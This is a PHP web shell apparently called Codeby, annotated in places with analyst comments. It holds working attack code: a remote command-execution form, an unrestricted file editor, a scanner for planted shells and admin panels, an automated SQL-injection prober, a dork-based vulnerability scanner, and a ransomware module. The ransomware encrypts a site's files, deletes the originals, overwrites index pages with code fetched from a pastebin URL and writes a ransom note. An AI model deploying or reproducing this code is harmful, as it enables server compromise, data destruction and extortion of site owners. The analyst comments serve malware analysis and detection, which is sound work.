1<? header('Content-Type: text/html; charset=utf-8'); ?>
2<link rel="shortcut icon" href="https://codeby.net/wp-content/uploads/2016/06/codeby_branding21-1.png" type="image/x-icon">
3<style type="text/css">
4 body{
5 background:black;
6 color: "#00ff7f";
7 }
8 #menu{
9 background:#000000;
10 margin:8px 2px 4px 2px;
11 font-family:Fredericka the Great;
12 font-size:14px;
13 color: red;
14 }
15
16 #search, #miner
17{
18 padding: 8px 9px;
19 width: 350px;
20 border: 1px solid #a4c3ca;
21 font: normal 13px 'trebuchet MS', arial, helvetica;
22 background: #f1f1f1;
23
24 -moz-border-radius: 50px 3px 3px 50px;
25 border-radius: 50px 3px 3px 50px;
26 -moz-box-shadow: 0 1px 3px rgba(0, 0, 0, 0.25) inset, 0 1px 0 rgba(255, 255, 255, 1);
27 -webkit-box-shadow: 0 1px 3px rgba(0, 0, 0, 0.25) inset, 0 1px 0 rgba(255, 255, 255, 1);
28 box-shadow: 0 1px 3px rgba(0, 0, 0, 0.25) inset, 0 1px 0 rgba(255, 255, 255, 1);
29}
30
31
32#submit
33{
34 background: white;
35 background-image: -moz-linear-gradient(#000000, #000000);
36 background-image: -webkit-gradient(linear,left bottom,left top,color-stop(0, #000000),color-stop(1, #000000));
37
38 -moz-border-radius: 3px 50px 50px 3px;
39 border-radius: 1px 50px 50px 3px;
40
41 border-width: 1px;
42 border-style: solid;
43 border-color: #000000 #000000 #000000;
44
45 -moz-box-shadow: 0 0 1px rgba(0, 0, 0, 0.3), 0 1px 0 rgba(255, 255, 255, 0.3) inset;
46 -webkit-box-shadow: 0 0 1px rgba(0, 0, 0, 0.3), 0 1px 0 rgba(255, 255, 255, 0.3) inset;
47 box-shadow: 0 0 1px rgba(0, 0, 0, 0.3), 0 1px 0 rgba(255, 255, 255, 0.3) inset;
48
49 height: 35px;
50 margin: 0 0 0 10px;
51 padding: 0;
52 width: 90px;
53 cursor: pointer;
54 font: bold 14px Arial, Helvetica;
55 color: white;
56
57 text-shadow: 0 1px 0 rgba(255,255,255,0.5);
58}
59
60 a{
61 color: white;
62 text-decoration: none;
63 }
64
65 #menu a{
66 padding:3px 6px;
67 margin:1;
68 background:#000000;
69 text-decoration:none;
70 letter-spacing:2px;
71 -moz-border-radius: 10px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
72 }
73 #menu a:hover{
74 background:black;
75 border-bottom:1px solid #ffffff;
76 border-top:1px solid #ffffff;
77 }
78
79</style>
80
81<body>
82
83<br/>
84<center>
85<pre style=' color: grey; font-size: 20px;'>
86_________ .___ ___. __
87\_ ___ \ ____ __| _/____\_ |__ ___.__. ____ _____/ |_
88/ \ \/ / _ \ / __ |/ __ \| __ < | | / \_/ __ \ __\
89\ \___( <_> ) /_/ \ ___/| \_\ \___ | | | \ ___/| |
90 \______ /\____/\____ |\___ >___ / ____| /\ |___| /\___ >__|
91 \/ \/ \/ \/\/ \/ \/ \/ </pre></center>
92
93
94
95<br><br><center>
96 <form id="searchbox" method="POST" action="">
97 <input id="search" type="text" name="shell" placeholder="Command shell">
98 <input id="submit" type="submit" name= "ok" value="Command">
99 </form>
100</center><br/>
101<br/><center><font color="white">Linux localhost 2.4.21-0.13mdk #1 Fri Mar 14 15:08:06 EST 2003 i686</font><br/><br/>
102
103<font color="blue"><? sysinfo(); ?></font></center></center>
104
105<?
106
107 echo "<font color='white'><br/><br/><center>PHP Version: ".phpversion().'<br/>';
108 echo $_SERVER['SERVER_NAME'].'<br/>';
109 echo $_SERVER['SERVER_SOFTWARE']."</center>";
110
111?>
112
113
114<br><br><center><div id="menu">
115<a href="?">Home</a> <font color=orange>*</font>
116<a href="?<?php echo "path=".$path; ?>&x=rans">Ransomware</a><font color=orange>*</font>
117<a href="?<?php echo "path=".$path; ?>&x=dorks">Dorks</a> <font color=orange>*</font>
118<a href="?<?php echo "path=".$path; ?>&x=grabc">Config Grabber</a> <font color=orange>*</font>
119<a href="?<?php echo "path=".$path; ?>&x=killer">IP Killer</a> <font color=orange>*</font>
120<a href="?<?php echo "path=".$path; ?>&x=whois">Intelligence Service</a> <font color=orange></font>
121<br><br>
122<a href="?<?php echo "path=".$path; ?>&x=word">Wordpress Scanner</a> <font color=orange>*</font>
123<a href="?<?php echo "path=".$path; ?>&x=sql">SQL-Injection</a> <font color=orange>*</font>
124<a href="?<?php echo "path=".$path; ?>&x=shell">Shell | Admin Finder</a> <font color=orange>*</font>
125<a href="?<?php echo "path=".$path; ?>&x=sherlock">Sherlock</a> <font color=orange>*</font>
126<a href="?<?php echo "path=".$path; ?>&x=krdp">Create RDP</a> <font color=orange>*</font>
127<a href="?<?php echo "path=".$path; ?>&x=spam">Spam Tool</a> <font color=orange>*</font>
128<a href="?<?php echo "path=".$path; ?>&x=about">About</a>
129</div></center>
130
131
132<?php
133
// Analyst note: removes PHP's execution time limit and switches off all error
// reporting for the rest of the request, so long-running actions are not cut
// short and failures raise no PHP notices or warnings.
134set_time_limit(0);
135error_reporting(0);
136
137
/**
 * Analyst note: host-profiling routine of this web shell.
 *
 * Echoes, as HTML, the safe_mode setting, the raw disable_functions ini value,
 * and ON/OFF flags for mysql_connect(), curl_version() and for the wget, perl
 * and python binaries. The three binaries are probed by actually running
 * "<name> --help" through exe(), so every page load that reaches this call
 * spawns those child processes (presumably as the web-server user), which is
 * a usable process-creation signal for detection.
 *
 * Takes no parameters and returns nothing; all results are echoed.
 */
138function sysinfo(){
139 echo '<font color="white">[#] '.$sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "Safe Mode: <font color='green'>ON<br/></font>" : "Safe Mode: <font color='red'>OFF<br/></font>";
140 echo '[#] '.$ds = @ini_get("disable_functions");
141 echo $mysql = (function_exists('mysql_connect')) ? "MySQL: <font color='green'>ON</font> " : "MySql: <font color='red'> OFF</font> ";
142 echo ' [#] '.$curl = (function_exists('curl_version')) ? "CURL: <font color='green'>ON </font>" : "CURL: <font color='red'>OFF </font> ";
143 echo ' [#] '.$wget = (exe('wget --help')) ? "Wget: <font color='green'>ON<br/></font>" : "WGET: <font color='red'>OFF<br/></font> ";
144 echo ' [#] '.$perl = (exe('perl --help')) ? "Perl: <font color='green'>ON </font>" : "PERL: <font color='red'>OFF </font> ";
145 echo ' [#] '.$python = (exe('python --help')) ? "Python:<font color='green'> ON<br/></font>" : "Python: <font color='red'>OFF</font> ";
146}
147
/**
 * Analyst note: command-execution primitive used by the rest of the shell.
 *
 * Hands $cmd, unmodified, to the first of system(), exec(), passthru() and
 * shell_exec() for which function_exists() is true, and returns whatever
 * output was captured. Every call is prefixed with @, so errors stay silent.
 *
 * @param mixed $cmd command line passed unchanged to the underlying function
 * @return mixed captured output; nothing is returned when none of the four
 *               functions is available
 *
 * Hardening note: because of the fallback chain, listing only some of these
 * functions in disable_functions does not stop this routine.
 */
148function exe($cmd) {
149 if(function_exists('system')) {
150 @ob_start();
151 @system($cmd);
152 $buff = @ob_get_contents();
153 @ob_end_clean();
154 return $buff;
155 } elseif(function_exists('exec')) {
156 @exec($cmd,$results);
157 $buff = "";
// exec() output lines are concatenated with no separator between them.
158 foreach($results as $result) {
159 $buff .= $result;
160 } return $buff;
161 } elseif(function_exists('passthru')) {
162 @ob_start();
163 @passthru($cmd);
164 $buff = @ob_get_contents();
165 @ob_end_clean();
166 return $buff;
167 } elseif(function_exists('shell_exec')) {
168 $buff = @shell_exec($cmd);
169 return $buff;
170 }
171}
172
// Analyst note: the directory shown by the file browser is taken straight from
// the "path" query parameter with no validation or confinement; when the
// parameter is absent the script's current working directory is used.
// Backslashes are normalised to "/" and the result is also split into $paths.
// Requests to one script carrying ?path= together with the ?filesrc=, ?option
// and ?x= parameters used further down this page are a log-search pivot for
// this sample.
173if(isset($_GET['path'])){
174$path = $_GET['path'];
175}else{
176$path = getcwd();
177}
178$path = str_replace('\\','/',$path);
179$paths = explode('/',$path);
180
/**
 * Render the mode of $file as a ten-character, ls-style string
 * (for example "-rw-r--r--" or "drwxr-xr-x").
 *
 * The first character is the file type; the remaining nine are the
 * read/write/execute triplets for owner, group and world, with the
 * setuid, setgid and sticky bits folded into the execute position.
 *
 * @param mixed $file path handed to fileperms()
 * @return string type character followed by nine permission characters
 */
function perms($file){
    $mode = fileperms($file);

    // Checked from the highest mask to the lowest; the first mask whose bits
    // are all set in the mode decides the type character.
    $typeMasks = array(
        0xC000 => 's', // socket
        0xA000 => 'l', // symbolic link
        0x8000 => '-', // regular file
        0x6000 => 'b', // block special
        0x4000 => 'd', // directory
        0x2000 => 'c', // character special
        0x1000 => 'p', // FIFO pipe
    );
    $out = 'u'; // unknown type unless a mask matches
    foreach ($typeMasks as $mask => $char) {
        if (($mode & $mask) == $mask) {
            $out = $char;
            break;
        }
    }

    // Per class: read bit, write bit, execute bit, special bit,
    // character when special+execute are set, character when only special is set.
    $classes = array(
        array(0x0100, 0x0080, 0x0040, 0x0800, 's', 'S'), // owner / setuid
        array(0x0020, 0x0010, 0x0008, 0x0400, 's', 'S'), // group / setgid
        array(0x0004, 0x0002, 0x0001, 0x0200, 't', 'T'), // world / sticky
    );
    foreach ($classes as $class) {
        list($readBit, $writeBit, $execBit, $specialBit, $withExec, $withoutExec) = $class;

        $out .= ($mode & $readBit) ? 'r' : '-';
        $out .= ($mode & $writeBit) ? 'w' : '-';

        if ($mode & $execBit) {
            $out .= ($mode & $specialBit) ? $withExec : 'x';
        } else {
            $out .= ($mode & $specialBit) ? $withoutExec : '-';
        }
    }

    return $out;
}
234
235 if(isset($_GET['filesrc'])){
236 echo "<center><br /><tr><td>You Are Looking : ";
237 echo $_GET['filesrc'];
238 echo '</tr></td></table>';
239 echo('<br /><br /><textarea rows="20" cols="80">'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</textarea></center>');
240 break;
241 }
242
243
244 elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
245 echo '</table><br /><br><center>'.$_POST['path'].'<br /><br />';
246 if($_POST['opt'] == 'chmod'){
247 if(isset($_POST['perm'])){
248 if(chmod($_POST['path'],$_POST['perm'])){
249 echo '<script>alert("Change Permission Sukses!");</script>';
250 }else{
251 echo '<script>alert("Change Permission Gagal!");</script>';
252 }
253 }
254 echo '<form method="POST">
255 Permission : <input name="perm" class="bordergaya" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
256 <input type="hidden" name="path" value="'.$_POST['path'].'">
257 <input type="hidden" name="opt" value="chmod">
258 <input class="bordergaya" type="submit" value="Go" />
259 </form>';
260 }elseif($_POST['opt'] == 'rename'){
261 if(isset($_POST['newname'])){
262 if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
263 echo '<script>alert("Change Name Sukses!");</script>';
264 }else{
265 echo '<script>alert("Change Name Gagal!");</script>';
266 }
267 $_POST['name'] = $_POST['newname'];
268 }
269 echo '<form method="POST">
270 New Name : <input class="bordergaya" name="newname" type="text" size="20" value="'.$_POST['name'].'" />
271 <input type="hidden" name="path" value="'.$_POST['path'].'">
272 <input type="hidden" name="opt" value="rename">
273 <input class="bordergaya" type="submit" value="Go" />
274 </form>';
275 }elseif($_POST['opt'] == 'edit'){
276 if(isset($_POST['src'])){
277 $fp = fopen($_POST['path'],'w');
278 if(fwrite($fp,$_POST['src'])){
279 echo '<script>alert("Edit File Sukses!");</script>';
280 }else{
281 echo '<script>alert("Edit File Gagal!");</script>';
282 }
283 fclose($fp);
284 }
285 echo '<form method="POST">
286 <textarea class="bordergaya" cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
287 <input type="hidden" name="path" value="'.$_POST['path'].'">
288 <input type="hidden" name="opt" value="edit">
289 <input class="bordergaya" type="submit" value="Go" />
290 </form>';
291 }
292 echo '</center>';
293 }
294 echo '</center>';
295 $scandir = scandir($path);
296 echo '<br/><br/><div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
297 ';
298
299 foreach($scandir as $dir){
300 if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
301 echo "<tr>
302 <td><a style='color:white; font-family:Homenaje;' href=\"?path=$path/$dir\">$dir</a></td>
303 <td><center style='color:orange; font-family:Homenaje;'>--</center></td>
304 <td><center>";
305 if(is_writable("$path/$dir")) echo "<font style='color:springgreen; font-family:Homenaje;'>";
306 elseif(!is_readable("$path/$dir")) echo "<font style='color:red; font-family:Homenaje;'>";
307 echo perms("$path/$dir");
308 if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
309
310 echo "</center></td>
311 <td width='26%'><center><form method=\"POST\" action=\"?option&path=$path\">
312 <select class='bordergaya' name=\"opt\">
313 <option value=\"\"></option>
314 <option value=\"chmod\">Chmod</option>
315 <option value=\"rename\">Rename</option>
316 </select>
317 <input type=\"hidden\" name=\"type\" value=\"dir\">
318 <input type=\"hidden\" name=\"name\" value=\"$dir\">
319 <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
320 <input class='bordergaya' type=\"submit\" value=\"Execute\" />
321 </form></center></td>
322 </tr>";
323 }
324 echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
325 foreach($scandir as $file){
326 if(!is_file("$path/$file")) continue;
327 $size = filesize("$path/$file")/1024;
328 $size = round($size,3);
329 if($size >= 1024){
330 $size = round($size/1024,2).' MB';
331 }else{
332 $size = $size.' KB';
333 }
334
335 echo "<tr>
336 <td><a style='color:white; font-family:Homenaje;' href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
337 <td><center style='color:orange; font-family:Homenaje;'>".$size."</center></td>
338 <td><center>";
339 if(is_writable("$path/$file")) echo "<font style='color:springgreen; font-family:Homenaje;'>";
340 elseif(!is_readable("$path/$file")) echo "<font style='color:red; font-family:Homenaje;'>";
341 echo perms("$path/$file");
342 if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
343 echo "</center></td>
344 <td width='26%'><center><form method=\"POST\" action=\"?option&path=$path\">
345 <select class='bordergaya' name=\"opt\">
346 <option value=\"\"></option>
347 <option value=\"chmod\">Chmod</option>
348 <option value=\"rename\">Rename</option>
349 <option value=\"edit\">Edit</option>
350 </select>
351 <input type=\"hidden\" name=\"type\" value=\"file\">
352 <input type=\"hidden\" name=\"name\" value=\"$file\">
353 <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
354 <input class='bordergaya' type=\"submit\" value=\"Execute\" />
355 </form></center></td>
356 </tr>";
357 }
358 echo '</table>
359 </div></font><font color="white">';
360
361
362
363if(isset($_GET['x']) && ($_GET['x'] == 'shell')) {
364
365 ?>
366 <font color="white"><br/><br/><center><h3>Shell | Admin Finder</h3></font>
367 <br/><form method = "POST">
368 <input type = "text" name = "url" placeholder="http://www.site.com/"/>
369 <select name="Finder">
370 <option value="Admin">Admin</option>
371 <option value="Shell">Shell</option>
372 </select>
373 <input type = "submit" name = "Submit" value = "Finder"/>
374 </form>
375
376 <?
377 $shells = array("/images/sa.php","wso.php", "dz.php","cpanel.php","cpn.php",'sql.php',"mysql.php","madspot.php",
378 "Cgishell.pl","killer.php","changeall.php","2.php","Sh3ll.php","dz0.php","dam.php","user.php","dom.php","whmcs.php",
379 "vb.zip","r00t.php","c99.php","gaza.php","1.php","wp.zip","wp-content/plugins/disqus-comment-system/disqus.php",
380 "d0mains.php","wp-content/plugins/akismet/akismet.php","madspotshell.php","Sym.php","c22.php","c100.php",
381 "wp-content/plugins/akismet/admin.php","wp-content/plugins/google-sitemap-generator/sitemap-core.php",
382 "wp-content/plugins/akismet/widget.php","Cpanel.php","zone-h.php","tmp/user.php","tmp/Sym.php","cp.php",
383 "tmp/madspotshell.php","tmp/root.php","tmp/whmcs.php","tmp/index.php","tmp/2.php","tmp/dz.php","tmp/cpn.php",
384 "tmp/changeall.php","tmp/Cgishell.pl","tmp/sql.php","tmp/admin.php","cliente/downloads/h4xor.php",
385 "whmcs/downloads/dz.php","L3b.php","d.php","tmp/d.php","tmp/L3b.php","wp-content/plugins/akismet/admin.php",
386 "templates/rhuk_milkyway/index.php","templates/beez/index.php","admin1.php","upload.php","up.php","vb.zip","vb.rar",
387 "admin2.asp","uploads.php","sa.php","sysadmins/","admin1/","administration/Sym.php","images/Sym.php",
388 "/r57.php","/wp-content/plugins/disqus-comment-system/disqus.php","/shell.php","/sa.php","/admin.php",
389 "/sa2.php","/2.php","/gaza.php","/up.php","/upload.php","/uploads.php","/templates/beez/index.php","shell.php","/amad.php",
390 "/t00.php","/dz.php","/site.rar","/Black.php","/site.tar.gz","/home.zip","/home.rar","/home.tar","/home.tar.gz",
391 "/forum.zip","/forum.rar","/forum.tar","/forum.tar.gz","/cpanel","/awstats","/site.sql","/vb.sql","/forum.sql","/backup.sql","/back.sql","/
392 data.sql","/wp.rar/","wp-content/plugins/disqus-comment-system/disqus.php","asp.aspx","/templates/beez/index.php","tmp/vaga.php","tmp/killer.php",
393 "/whmcs.php","tmp/killer.php","tmp/domaine.pl","tmp/domaine.php","useradmin/","/tmp/d0maine.php","d0maine.php","tmp/sql.php","tmp/dz1.php","
394 dz1.php","forum.zip","Symlink.php","Symlink.pl","/forum.rar","/joomla.zip","/joomla.rar","/wp.php","buck.sql","sysadmin.php","images/c99.php", "xd.php", "c100.php","/spy.aspx","/xd.php","/tmp/xd.php","billing/killer.php","tmp/upload.php","tmp/admin.php","Server.php","tmp/uploads.php","tmp/
395 up.php","wp-admin/c99.php","tmp/priv8.php","priv8.php","/cgi.pl/","/tmp/cgi.pl","/downloads/dom.php","/templates/ja-helio-farsi/index.php","/
396 webadmin.html","/admins.php", "/wp-content/plugins/count-per-day/js/yc/d00.php");
397
398 $admin = array("admin","administrator","adm","login","loign.php","administrator.php","admins.php","logins","admincp","admincp.php","admin1.php", "admin1.html", "admin2.php", "admin2.html", "yonetim.php", "yonetim.html", "yonetici.php", "yonetici.html", "ccms/", "ccms/login.php", "ccms/index.php", "maintenance/", "webmaster/", "adm/", "configuration/", "configure/", "websvn/", "admin/", "admin/account.php", "admin/account.html". "admin/index.php", "admin/index.html", "admin/login.php","admin/login.html", "admin/home.php", "admin/controlpanel.html", "admin/controlpanel.php", "admin.php", "admin.html", "admin/cp.php", "admin/cp.html", "cp.php", "cp.html", "administrator/","administrator/index.html", "administrator/index.php", "administrator/login.html", "administrator/login.php", "administrator/account.html", "administrator/account.php", "administrator.php","administrator.html", "login.php", "login.html", "modelsearch/login.php", "moderator.php", "moderator.html", "moderator/login.php", "moderator/login.html","moderator/admin.php","moderator/admin.html", "moderator/", "account.php", "account.html", "controlpanel/", "controlpanel.php", "controlpanel.html", "admincontrol.php", "admincontrol.html", "adminpanel.php","adminpanel.html", "admin1.asp", "admin2.asp", "yonetim.asp", "yonetici.asp", "admin/account.asp", "admin/index.asp", "admin/login.asp", "admin/home.asp", "admin/controlpanel.asp", "admin.asp", "admin/cp.asp", "cp.asp", "administrator/index.asp","administrator/login.asp","administrator/account.asp","administrator.asp", "login.asp", "modelsearch/login.asp", "moderator.asp","moderator/login.asp", "moderator/admin.asp", "account.asp", "controlpanel.asp", "admincontrol.asp", "adminpanel.asp", "fileadmin/", "fileadmin.php", "fileadmin.asp", "fileadmin.html","administration/", "administration.php", "administration.html", "sysadmin.php", "sysadmin.html", "phpmyadmin/", "myadmin/", "sysadmin.asp", "sysadmin/", "ur-admin.asp", "ur-admin.php","ur-admin.html", 
"ur-admin/", "Server.php", "Server.html", "Server.asp", "Server/", "wp-admin/", "administr8.php", "administr8.html", "administr8/", "administr8.asp", "webadmin/", "webadmin.php","webadmin.asp", "webadmin.html", "administratie/", "admins/", "admins.php", "admins.asp", "admins.html", "administrivia/", "Database_Administration/", "WebAdmin/", "useradmin/", "sysadmins/","admin1/", "system-administration/", "administrators/", "pgadmin/", "directadmin/", "staradmin/", "ServerAdministrator/", "SysAdmin/", "administer/", "LiveUser_Admin/", "sys-admin/", "typo3/","panel/", "cpanel/", "cPanel/", "cpanel_file/", "platz_login/", "rcLogin/", "blogindex/", "formslogin/", "autologin/", "support_login/", "meta_login/", "manuallogin/", "simpleLogin/", "loginflat/","utility_login/", "showlogin/", "memlogin/", "members/", "login-redirect/", "sub-login/", "wp-login/", "login1/", "dir-login/", "login_db/", "xlogin/", "smblogin/", "customer_login/", "UserLogin/","login-us/", "acct_login/", "admin_area/", "bigadmin/", "project-admins/", "phppgadmin/", "pureadmin/", "sql-admin/", "radmind/", "openvpnadmin/", "wizmysqladmin/", "vadmind/", "ezsqliteadmin/","hpwebjetadmin/", "newsadmin/", "adminpro/", "Lotus_Domino_Admin/", "bbadmin/", "vmailadmin/", "Indy_admin/", "ccp14admin/", "irc-macadmin/","banneradmin/","sshadmin/","phpldapadmin/","macadmin/","administratoraccounts/", "admin4_account/","admin4_colon/","radmind-1/","SuperAdmin/","AdminTools/","cmsadmin/","SysAdmin2/","globes_admin/","cadmins/","phpSQLiteAdmin/", "navSiteAdmin/","server_admin_small/","logo_sysadmin/","server/","database_administration/","power_user/", "system_administration/", "ss_vms_admin_sm/");
399 $url = $_POST['url'];
400 if(isset($_POST['Finder'])){
401 $course = $_POST['Finder'];
402 if($course == 'Shell'){ $find = $shells; } else { $find = $admin; }
403 }
404 foreach ($find as $shell){
405 $headers = get_headers($url.$shell);
406 if(stristr($headers[0],"200")){
407 echo "<center><a href='$url$shell'>$url$shell</a> Founded!</center><br /><br/><br/>";
408 }
409 }
410 }
411
412 elseif(isset($_GET['x']) && ($_GET['x'] == 'sql')) {
413 ?>
414 <font color="#00ff7f"><br/><br/><center><h3>SQL Injection</h3></font>
415 <br/><form method="POST">
416 <textarea cols="40" rows="2" name="url"></textarea><br/><br/>
417 <input type="submit" name="sql" value="SQL">
418 </form>
419 <?php
420 $input = isset($_POST['url'])?$_POST['url']:"";
421 $ids = explode("\n", str_replace("\r", "", $input));
422 foreach ($ids as $target) {
423 echo $target;
424
425 if(isset($_POST['sql'])){
426 $req = file_get_contents($target."'");
427 if(stristr($req,"MySQL")){
428 echo "<br>SQL Found !<br/>";
429 for($i=1;$i<=500;$i++) { // Да, да 500, потом улучшу.
430 $un .= "{$i},";
431 $col = file_get_contents($target."+order+by+{$i}+--+");
432 if(stristr($col,"column ") or stristr($col, 'MySQL ')){
433 break;
434 }
435 }
436 echo "Column: ".$i.'<br/>';
437 $un = mb_substr($un, 0, -1);
438 echo $target.'+union+select+'.$un.'--<br/><br/>';
439 }
440 }
441 }
442 }
443
444 elseif(isset($_GET['x']) && ($_GET['x'] == 'rans')) {
445 ?> <form method="POST">
446 <font color="white"><br/><br/><center><h3>Rasnomware</h3></font>
447 <center><br/>
448 Dir:
449 <input type="text" name="direc" value=<?php echo $_SERVER['DOCUMENT_ROOT']; ?> ><br/><br/>
450 <font color='#6B8E23'>Mcrypt: </font><br/><br/>
451 Key:
452 <input type="text" name="key1" placeholder="ENC/DEC">
453 <select name="mcrdec">
454 <option value="encrypt">Encrypt</option>
455 <option value="decrypt">Decrypt</option>
456 </select>
457 <input type="submit" name="ok" class="b1" value="Enc/Dec">
458 </center><br/>
459 </form>
460 <br/><br/><form method='POST'>
461 <center>
462 Message:<br/><br/>
463 <textarea name="dor" rows=12></textarea><br/><br/>
464 <input type='submit' name='enter' value='Write'>
465 </center>
466 </form>
467 <?
468
469 function encrypt_decrypt($action, $string, $secret_key, $encrypt_method, $iv) {
470 $output = false;
471 $key = hash('sha256', $secret_key);
472 if( $action == 'encrypt' ) {
473 return base64_encode(openssl_encrypt($string, $encrypt_method, $key, 0, $iv));
474 }
475 else if( $action == 'decrypt' ){
476 return openssl_decrypt(base64_decode($string), $encrypt_method, $key, 0, $iv);
477 }
478 }
479
480function mcrypt($file){
481 if (strpos($file, '.htaccess') != false) return;
482 if (strpos($file, '.FS') != false) return;
483 if (strpos($file, 'Readme.html') != false) return;
484 if (strpos($file, 'rans') != false) return;
485 $code = file_get_contents('http://pastebin.com/raw/P5MskjcX');
486 if (strpos($file, 'index') != false) { file_put_contents($file, $code); return;}
487
488 $iv = mcrypt_create_iv(
489 mcrypt_get_iv_size(MCRYPT_RIJNDAEL_256, MCRYPT_MODE_CBC),
490 MCRYPT_DEV_URANDOM
491 );
492 $key = $_POST['key1'];
493 $encrypted = base64_encode( $iv . mcrypt_encrypt(MCRYPT_RIJNDAEL_256, hash('sha256', $key, true), file_get_contents($file), MCRYPT_MODE_CBC, $iv));
494 file_put_contents($file.'.FS', $encrypted);
495 unlink($file);
496}
497
// Analyst note: writes the POSTed "dor" field verbatim to Readme.html in the
// script's working directory. Given the "Message" form above and the fact that
// the file routines in this section skip paths containing "Readme.html", this
// is presumably the ransom note; its presence next to *.FS files is an
// on-disk indicator for this sample.
498if(isset($_POST['enter'])){
499 $f = fopen("Readme.html", "w");
500 fwrite($f, $_POST['dor']);
501 fclose($f);
502}
503
/**
 * Analyst note: the "Decrypt" routine of the ransomware section.
 *
 * What the code does, in order:
 *  - returns early for paths in which strpos() finds ".htaccess",
 *    "Readme.html" or "rans" (the loose "!= false" test means a match at
 *    offset 0 is not counted);
 *  - fetches content from the pastebin URL below on every call (an outbound
 *    HTTP request per file, usable as a network indicator) and overwrites any
 *    path containing "index" with it;
 *  - otherwise creates a fresh random IV, passes the file contents exactly as
 *    read to mcrypt_decrypt() with the raw SHA-256 of the POSTed "key1",
 *    strips the last three characters of the name, writes the result there
 *    and deletes the ".FS" file.
 *
 * Incident-response caveat: the encrypt routine on this page stores
 * base64_encode($iv . ciphertext). This routine neither base64-decodes its
 * input nor reuses the stored IV, so it does not appear to invert that
 * format, and it then unlinks the ".FS" file. Treat the shell's own decrypt
 * option as destructive and preserve the ".FS" files; recovery would need the
 * key plus the IV held in the leading bytes of the decoded data.
 *
 * @param mixed $file path of the file to process
 * @return void
 */
504function z1($file){
505 if (strpos($file, '.htaccess') != false) return;
506 if (strpos($file, 'Readme.html') != false) return;
507 if (strpos($file, 'rans') != false) return;
508 $code = file_get_contents('http://pastebin.com/raw/P5MskjcX');
509 if (strpos($file, 'index') != false) { file_put_contents($file, $code); return;}
510 $iv = mcrypt_create_iv(
511 mcrypt_get_iv_size(MCRYPT_RIJNDAEL_256, MCRYPT_MODE_CBC),
512 MCRYPT_DEV_URANDOM
513 );
514 $key = $_POST['key1'];
515 $dec = mcrypt_decrypt(MCRYPT_RIJNDAEL_256, hash('sha256', $key, true), file_get_contents($file), MCRYPT_MODE_CBC, $iv);
516 $file = substr($file, 0, -3);
517 file_put_contents($file, $dec);
518 unlink($file.'.FS');
519}
520
521function encdir($dir, $func){
522 $j = 0;
523 $files = array_diff(scandir($dir), array('.', '..'));
524 foreach ($files as $filecip){
525 if(is_dir($dir.'\\'.$filecip)){
526 encdir($dir.'\\'.$filecip, $func);
527 }else{
528 $j++;
529 echo "Encrypted in the directory ".$j.' ';
530 $findme = 'z';
531 $findme1 = 'Y';
532 $pos1 = stripos($func, $findme);
533 $pos2 = stripos($func, $findme1);
534 if ($pos1 !== false){
535 echo "file: ".$dir."\\".$filecip." <font color='#6B8E23'>Decrypt!!!</font><br>";
536 }else{
537 echo "file: ".$dir."\\".$filecip." <font color='#800000'>Encrypt!!!</font><br>";
538 }
539 $func($dir.'/'.$filecip);
540 }
541 }
542}
543
544if(isset($_POST['ok'])){
545 echo '<center><font color="white">Website: '.$_SERVER['HTTP_HOST'].'<br/>';
546 echo 'Key: '.$_POST['key1'].'<br/>';
547 echo 'Method: Mcrypt</font></center><br/>';
548 if($_POST['mcrdec'] == 'encrypt') {
549 encdir($_POST['direc'], 'mcrypt');
550 }else if($_POST['mcrdec'] == 'decrypt'){
551 encdir($_POST['direc'] , 'z1');
552 }
553}
554}
555
556 elseif(isset($_GET['x']) && ($_GET['x'] == 'dorks')) {
557
558?>
559
560 <font color="white"><br/><br/><center><h3>Dorks</h3></font>
561<center><form method="POST">
562 Dorks:
563 <input type="text" name="dorks" placeholder="Dorks">
564 Page:
565 <input type="text" name="list" placeholder="List">
566 <input type="submit" name="go" value="Scanner">
567</form>
568<form method="POST">
569 Proxy Parser:<br/><br/>
570 <select name="Proxy">
571 <option value="1">http://proxyprivat.ru/freeproxies</option>
572 <option value="2">http://proxy.crushus.com/free-proxy-list.net</option>
573 </select>
574 <input type="submit" name="finders" value="Parser">
575 </form>
576</center>
577
578<?
579
580if(isset($_POST['finders'])){
581 $course = $_POST['Proxy'];
582 if($course == '1'){ $a = file_get_contents('http://proxyprivat.ru/freeproxies'); preg_match_all('#<tbody>(.+?)</tbody>#is', $a, $links); } else { $a = file_get_contents('http://proxy.crushus.com/free-proxy-list.net'); preg_match_all('#<div class="table-responsive">(.+?)</tbody>#is', $a, $links); }
583}
584
585foreach ($links[0] as $key) {
586 $dir = __DIR__;
587 file_put_contents($dir.'\proxy.php', "<? header('Content-Type: text/html; charset=utf-8'); ?><cener>".$key, FILE_APPEND);
588 ?>
589 <a href="proxy.php">Proxy</a>
590 <?
591}
592
593function curl($url) {
594 $curl = curl_init($url);
595 curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
596 $content = curl_exec($curl);
597 curl_close($curl);
598 return $content;
599}
600
601
602$dork = $_POST['dorks'];
603$allLinks = array();
604$lll = array();
605for ($i=0; $i < $_POST['list']; $i++) {
606 $x = curl("http://www.bing.com/search?q=".$dork."&first=".$i);
607 if($x) {
608 preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
609 foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
610
611 }
612 }
613
614function injek($url) {
615 $data = curl(str_replace("=", "='", $url));
616 return preg_match("#{$errors}#i", $data);
617}
618
619foreach($allLinks as $url) {
620 $urls = parse_url($url, PHP_URL_HOST);
621 $urls = "http://$urls/";
622
623 $_SESSION[$urls] = "1";
624 if(injek($url)) {
625 echo "$url<br/>";
626
627 }
628 }
629}
630
631
